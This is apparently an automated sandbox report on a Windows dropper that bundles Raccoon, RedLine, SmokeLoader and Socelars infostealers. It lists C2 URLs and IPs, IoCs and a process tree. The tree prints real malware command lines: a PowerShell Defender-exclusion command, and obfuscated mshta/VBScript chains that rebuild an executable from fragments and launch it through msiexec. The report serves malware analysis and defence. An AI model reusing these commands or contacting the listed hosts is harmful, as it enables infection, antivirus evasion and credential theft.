raccoon | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

max time kernel
169s
max time network
188s
platform
windows7_x64
resource
win7-en-20211014
submitted
09-11-2021 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Size

7.1MB
MD5

2b01f663d5244764e8c2d164d3345fd6
SHA1

2b0dfcc018a5da0f140352bd114fb0f5e9abdfc3
SHA256

1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d
SHA512

2c7dd219673800320e3432ff6d8d2e5c2c3ae60a5f5960097d16ff79f385186ce13a81ea5a2b3d17652161d55ea552712f73d2d154b377fa74ec10043469dab4

Score

10^/10

raccoon redline smokeloader socelars 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 fuck1 aspackv2 backdoor infostealer spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes

url4cnc
http://telegatt.top/oh12manymarty

http://telegka.top/oh12manymarty

http://telegin.top/oh12manymarty

https://t.me/oh12manymarty

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

fuck1

135.181.129.119:4805

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral15/memory/3012-248-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral15/memory/3012-251-0x000000000041B23E-mapping.dmp	family_redline
behavioral15/memory/2264-267-0x000000000041B23E-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

resource	yara_rule
behavioral15/files/0x0003000000013ff4-99.dat	family_socelars
behavioral15/files/0x0003000000013ff4-122.dat	family_socelars
behavioral15/files/0x0003000000013ff4-113.dat	family_socelars

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral15/files/0x00060000000125f8-66.dat	aspack_v212_v242
behavioral15/files/0x00060000000125f8-65.dat	aspack_v212_v242
behavioral15/files/0x0005000000013903-64.dat	aspack_v212_v242
behavioral15/files/0x0005000000013903-63.dat	aspack_v212_v242
behavioral15/files/0x000500000001390b-69.dat	aspack_v212_v242
behavioral15/files/0x000500000001390b-70.dat	aspack_v212_v242

Executes dropped EXE 19 IoCs

pid	Process
688	setup_install.exe
1704	Mon201cb4c63ce4.exe
1260	Mon20c36d61c41847b17.exe
1724	Mon2024c1cb997.exe
1608	Mon206e4c938239.exe
1640	Mon20b3dfc29da.exe
1528	Mon200820e9da.exe
1844	Mon209df24d5e8f7.exe
1620	Mon20b09e42933548639.exe
1676	Mon204858e151.exe
824	Mon2050daa466f6f.exe
1576	Mon20e7747f4ca9880.exe
2180	Mon209df24d5e8f7.exe
2456	Mon201629b9d021e.exe
2828	O5lIe.exE
3036	Mon204858e151.exe
3012	Mon206e4c938239.exe
2264	Mon204858e151.exe
2848	Mon2009d34d832dfd1d9.exe

Loads dropped DLL 64 IoCs

pid	Process
1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
1524	cmd.exe
1392	cmd.exe
1060	cmd.exe
1704	Mon201cb4c63ce4.exe
1704	Mon201cb4c63ce4.exe
1724	Mon2024c1cb997.exe
1724	Mon2024c1cb997.exe
1916	cmd.exe
1916	cmd.exe
1168	cmd.exe
1168	cmd.exe
1608	Mon206e4c938239.exe
1608	Mon206e4c938239.exe
880	cmd.exe
880	cmd.exe
1912	cmd.exe
1528	Mon200820e9da.exe
1528	Mon200820e9da.exe
1616	cmd.exe
1844	Mon209df24d5e8f7.exe
1844	Mon209df24d5e8f7.exe
1532	cmd.exe
1532	cmd.exe
1732	cmd.exe
1732	cmd.exe
972	cmd.exe
1620	Mon20b09e42933548639.exe
1620	Mon20b09e42933548639.exe
1640	Mon20b3dfc29da.exe
1640	Mon20b3dfc29da.exe
1260	Mon20c36d61c41847b17.exe
1260	Mon20c36d61c41847b17.exe
1676	Mon204858e151.exe
1676	Mon204858e151.exe
824	Mon2050daa466f6f.exe
824	Mon2050daa466f6f.exe
1576	Mon20e7747f4ca9880.exe
1576	Mon20e7747f4ca9880.exe
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
1844	Mon209df24d5e8f7.exe
2180	Mon209df24d5e8f7.exe
2180	Mon209df24d5e8f7.exe
1288	cmd.exe
2072	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2740	cmd.exe
2828	O5lIe.exE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1844 set thread context of 2180	1844	Mon209df24d5e8f7.exe	61
PID 1608 set thread context of 3012	1608	Mon206e4c938239.exe	77
PID 1676 set thread context of 2264	1676	Mon204858e151.exe	82

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2072	688	WerFault.exe	28
2560	1260	WerFault.exe	39

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2840	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Mon20c36d61c41847b17.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Mon20c36d61c41847b17.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1528	Mon200820e9da.exe
1528	Mon200820e9da.exe
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
2072	WerFault.exe
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
1200	Process not Found
824	Mon2050daa466f6f.exe
2072	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1528	Mon200820e9da.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeAssignPrimaryTokenPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeLockMemoryPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeIncreaseQuotaPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeMachineAccountPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeTcbPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeSecurityPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeTakeOwnershipPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeLoadDriverPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeSystemProfilePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeSystemtimePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeProfSingleProcessPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeIncBasePriorityPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeCreatePagefilePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeCreatePermanentPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeBackupPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeRestorePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeShutdownPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeDebugPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeAuditPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeSystemEnvironmentPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeChangeNotifyPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeRemoteShutdownPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeUndockPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeSyncAgentPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeEnableDelegationPrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeManageVolumePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeImpersonatePrivilege	1260	Mon20c36d61c41847b17.exe
Token: SeCreateGlobalPrivilege	1260	Mon20c36d61c41847b17.exe
Token: 31	1260	Mon20c36d61c41847b17.exe
Token: 32	1260	Mon20c36d61c41847b17.exe
Token: 33	1260	Mon20c36d61c41847b17.exe
Token: 34	1260	Mon20c36d61c41847b17.exe
Token: 35	1260	Mon20c36d61c41847b17.exe
Token: SeDebugPrivilege	2072	WerFault.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2560	WerFault.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1200	Process not Found
1200	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 1500 wrote to memory of 688	1500	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	28
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1564	688	setup_install.exe	30
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1524	688	setup_install.exe	31
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1392	688	setup_install.exe	32
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 1060	688	setup_install.exe	33
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 316	688	setup_install.exe	34
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1052	688	setup_install.exe	35
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 688 wrote to memory of 1168	688	setup_install.exe	36
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1524 wrote to memory of 1704	1524	cmd.exe	37
PID 1392 wrote to memory of 1724	1392	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
"C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon201cb4c63ce4.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201cb4c63ce4.exe
      Mon201cb4c63ce4.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1704
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCript:ClOsE ( cREateObjEct ( "WSCRiPt.SheLl").rUN( "C:\Windows\system32\cmd.exe /Q /R CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201cb4c63ce4.exe"" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If """" == """" for %u In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201cb4c63ce4.exe"") do taskkill -f /iM ""%~nXu"" " ,0 , truE ) )
        5⤵
        
        PID:2140
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /R CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201cb4c63ce4.exe" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If "" == "" for %u In ( "C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201cb4c63ce4.exe") do taskkill -f /iM "%~nXu"
        6⤵
        Loads dropped DLL
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\O5lIe.exE
        
        O5lie.exe /p0vFkT3Hyul
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2828
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCript:ClOsE ( cREateObjEct ( "WSCRiPt.SheLl").rUN( "C:\Windows\system32\cmd.exe /Q /R CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\O5lIe.exE"" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If ""/p0vFkT3Hyul "" == """" for %u In ( ""C:\Users\Admin\AppData\Local\Temp\O5lIe.exE"") do taskkill -f /iM ""%~nXu"" " ,0 , truE ) )
        8⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /R CoPY /Y "C:\Users\Admin\AppData\Local\Temp\O5lIe.exE" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If "/p0vFkT3Hyul " == "" for %u In ( "C:\Users\Admin\AppData\Local\Temp\O5lIe.exE") do taskkill -f /iM "%~nXu"
        9⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRIPt: CLosE (CREAtEObJect ("wSCRipT.sHEll").RUN ( "cMd /C EcHo | set /P = ""MZ"" > 83~QW.MQM&copY /b /y 83~QW.MQM + K11w8L.CJH+GwZ9.K3 +XQkW.Nw6 nrRWTYRS.P & StArt msiexec -Y .\nRRWTYRS.p & DEL K11w8L.CJH GwZ9.K3 XQKW.Nw6 83~QW.MQm " , 0, trUE ))
        8⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EcHo | set /P = "MZ" > 83~QW.MQM&copY /b /y 83~QW.MQM +K11w8L.CJH+GwZ9.K3 +XQkW.Nw6 nrRWTYRS.P & StArt msiexec -Y .\nRRWTYRS.p & DEL K11w8L.CJH GwZ9.K3 XQKW.Nw6 83~QW.MQm
        9⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        10⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>83~QW.MQM"
        10⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y .\nRRWTYRS.p
        10⤵
        
        PID:912
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f /iM "Mon201cb4c63ce4.exe"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2024c1cb997.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon2024c1cb997.exe
      Mon2024c1cb997.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20c36d61c41847b17.exe
    3⤵
    - Loads dropped DLL
    PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20c36d61c41847b17.exe
      Mon20c36d61c41847b17.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1260
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 684
        5⤵
        Loads dropped DLL
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon203223fed8a4266c.exe
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2092b01a62c73.exe
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20b3dfc29da.exe
    3⤵
    - Loads dropped DLL
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b3dfc29da.exe
      Mon20b3dfc29da.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon200cb51003361.exe
    3⤵
    PID:984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2009d34d832dfd1d9.exe
    3⤵
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon2009d34d832dfd1d9.exe
      Mon2009d34d832dfd1d9.exe
      4⤵
      Executes dropped EXE
      PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon201629b9d021e.exe
    3⤵
    - Loads dropped DLL
    PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon201629b9d021e.exe
      Mon201629b9d021e.exe
      4⤵
      Executes dropped EXE
      PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon206e4c938239.exe
    3⤵
    - Loads dropped DLL
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon206e4c938239.exe
      Mon206e4c938239.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      PID:1608
    - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon206e4c938239.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon206e4c938239.exe
        5⤵
        Executes dropped EXE
        
        PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon200820e9da.exe
    3⤵
    - Loads dropped DLL
    PID:880
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon200820e9da.exe
      Mon200820e9da.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20b09e42933548639.exe
    3⤵
    - Loads dropped DLL
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b09e42933548639.exe
      Mon20b09e42933548639.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1620
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b09e42933548639.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b09e42933548639.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        5⤵
        
        PID:2212
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b09e42933548639.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20b09e42933548639.exe" ) do taskkill -f -iM "%~NxM"
        6⤵
        
        PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2050daa466f6f.exe /mixone
    3⤵
